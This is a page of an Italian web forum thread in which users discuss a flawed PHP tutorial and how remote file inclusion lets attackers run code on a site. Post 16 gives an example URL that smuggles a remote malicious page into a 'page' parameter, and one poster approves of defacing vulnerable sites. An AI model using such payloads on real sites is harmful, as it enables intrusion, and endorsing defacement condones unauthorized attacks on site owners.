Pagina 2 di 5 primaprima 1 2 3 4 ... ultimoultimo
Visualizzazione dei risultati da 11 a 20 su 50
  1. #11
    [supersaibal]Originariamente inviato da Fabio Heller
    Quell'articolo è criticabile, vedi l'esempio di inclusione in questa pagina
    http://pro.html.it/view_forum.asp?id=572&idcat=31&pag=2

    Se qualcuno defaccia certi siti fa bene: senza scendere in tecniche più complicate, basta ricordare che nelle versioni più recenti di PHP si può includere in quel modo una pagina remota, infatti file_exists lavora anche sulle pagine remote.
    A volte la cattiva fama che PHP si guadagna è "merito" di chi lo usa alla leggera [/supersaibal]
    Ora e' pure chiaro di chi e' il commento.....

    Il silenzio è spesso la cosa migliore. Pensa ... è gratis.

  2. #12
    [supersaibal]Originariamente inviato da piero.mac
    Ora e' pure chiaro di chi e' il commento..... [/supersaibal]
    No, quello è del mio compagno d'appartamento che mi ha segnalato l'articolo
    per favore NIENTE PVT TECNICI da sconosciuti

  3. #13
    non avevo letto l'articolo in questione, quella perla me l'ero persa

  4. #14
    Quell'articolo è ai limiti dello scandaloso
    Addio Aldo, amico mio... [03/12/70 - 16/08/03]

  5. #15
    [supersaibal]Originariamente inviato da Fabio Heller
    Quell'articolo è criticabile, vedi l'esempio di inclusione in questa pagina
    http://pro.html.it/view_forum.asp?id=572&idcat=31&pag=2

    Se qualcuno defaccia certi siti fa bene: senza scendere in tecniche più complicate, basta ricordare che nelle versioni più recenti di PHP si può includere in quel modo una pagina remota, infatti file_exists lavora anche sulle pagine remote.
    A volte la cattiva fama che PHP si guadagna è "merito" di chi lo usa alla leggera [/supersaibal]
    mi chiarite questo punto? come potrebbe essere possibile defacciare un sito grazie a quel tipo di inclusione? non si dovrebbe comunque avere accesso ai sorgenti del sito?
    Sotto la panza la mazza avanza.

  6. #16
    [supersaibal]Originariamente inviato da Caleb
    mi chiarite questo punto? come potrebbe essere possibile defacciare un sito grazie a quel tipo di inclusione? non si dovrebbe comunque avere accesso ai sorgenti del sito? [/supersaibal]
    se non c'è un controllo dell'esistenza del file sul server chiunque dal browser puo' includere una pagina remota con codice maligno

    esempio:
    index.php?lang=it&page=http://www.sitoesterno.php/paginazozza

  7. #17
    scusa ma in quel modo non lo vedrà defacciato solo lui?
    Sotto la panza la mazza avanza.

  8. #18
    [supersaibal]Originariamente inviato da Caleb
    scusa ma in quel modo non lo vedrà defacciato solo lui? [/supersaibal]
    se il codice è maligno è fatto apposta per farti dei casini che manco immagini
    si puo' prendere il controllo del database, e a quel punto è fatta

  9. #19
    [supersaibal]Originariamente inviato da Caleb
    scusa ma in quel modo non lo vedrà defacciato solo lui? [/supersaibal]
    In quel modo lo vedra' solo lui. Ma quello che puo' eseguire la pagina poi lo vedranno tutti gli altri.

    Vai da creare un account ad eseguire comandi su OS... e tutto quello che potresti fare in una pagina php.


    Il silenzio è spesso la cosa migliore. Pensa ... è gratis.

  10. #20
    [supersaibal]Originariamente inviato da piero.mac
    In quel modo lo vedra' solo lui. Ma quello che puo' eseguire la pagina poi lo vedranno tutti gli altri.

    Vai da creare un account ad eseguire comandi su OS... e tutto quello che potresti fare in una pagina php.

    [/supersaibal]
    piero quindi dimmi se sbaglio, a quel codice se si aggiunge un controllo sull'esistenza del file da includere SUL SERVER dovrebbe andare, no?

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.